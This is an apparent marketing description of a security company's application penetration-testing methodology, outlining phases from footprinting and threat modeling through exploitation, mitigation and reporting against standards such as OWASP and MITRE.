In initial phase we try to understand complete architecture of the application along with objectives. This phase is covered by assimilating various documents and interview process both on-site and off-site. This helps in scoping out the activities and road map. On the basis of requirements, functionalities and architecture we come up with possible action plans and efforts required to secure the applications.

Application Footprinting – It is important to identify all applications running on particular client’s infrastructure with zero knowledge. We are having our tools and methods by which we identify IP blocks, Hosts, Domains, Cross-domains and Child-domains. This helps in locking out all possible targets. 

Application Discovery – In this phase we identify all live and functional application set and can move to threat modeling for each of the applications running on client’s infrastructure. 

Application Threat Modeling – In this phase each application is studied very well and critical information will be mapped. This information set includes objectives, dependencies, type of servers (web, application and database), roles, components, third-party blocks and use cases. This information helps in identifying possible threat matrix on the basis of app possible attack vectors and library.

Application Deployment Assessment – Application deployment configurations and file system will be evaluated for web, application and database servers for security.

Application Enumeration and Profiling – In this phase we run several different tools against target application and enumerate entire application along with entry points and attributes for each of the resources residing on the application. This helps in profiling entire application along with modules, functionalities and resource attributes.

Security Control and Test Cases – On the basis of application we build a large set of possible test cases and security controls required for applications. This helps in building up all testing methods against vulnerabilities.

Security Control Categories – Authentication, Access Controls/Authorization, API misuse, Path traversal, Sensitive information leakage, Error handling, Session management, Protocol abuse, Input validations, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Logic bypass, Insecure crypto, Denial of Services, Malicious Code Injection, SQL injection, XPATH and LDAP injections, OS command injection, Parameter manipulations, Bruteforce, Buffer Overflow, Format string, HTTP response splitting, HTTP replay, XML injection, Canonicalization, Logging and auditing.

Vulnerability Assessment – On the basis of resource attribution and Control categories complete vulnerability scanning will be done using tools and manual observations. This helps in detecting vulnerabilities residing in the applications. This gives actionable item list for application security.

Exploitation and Pen-testing – In this case full blown penetration and exploitation of discovered vulnerabilities will be performed to detect the severity and possible impact of existing vulnerabilities.

Mitigation Strategies – On the basis of overall findings, vulnerabilities, architecture and best practices we will build a comprehensive plan for mitigation along with recommendation. These strategies need to be implemented for overall security of application layer.

Reporting – All observations, findings and test sets will be reported in the final document. We will encompass overall rating for all different findings. Report will cover findings, details, recommendation, severity, impact and references. We also map these findings to OWASP, WASC, MITRE, SANS, etc. to get better comparative results with industry standards.